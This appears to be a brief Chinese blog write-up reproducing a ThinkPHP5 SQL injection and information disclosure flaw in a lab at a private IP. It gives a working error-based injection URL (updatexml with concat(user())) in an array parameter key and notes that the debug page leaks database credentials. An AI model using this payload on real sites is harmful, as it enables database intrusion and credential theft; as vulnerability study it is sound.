ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞
基本原理
详细阅读参考资料:
漏洞复现
访问http://192.168.44.132/index.php?ids[]=1&ids[]=2,会看到显示用户名,说明环境运行成功。
打开页面http://192.168.44.132/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,你会发现消息显示成功:
并且可以通过调试页面找到数据库的账号和密码。
这是另一个敏感信息泄露漏洞。
ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞
- 本文链接: http://joker-vip.github.io/2022/03/01/ThinkPHP5%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&&%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E/
- 版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处!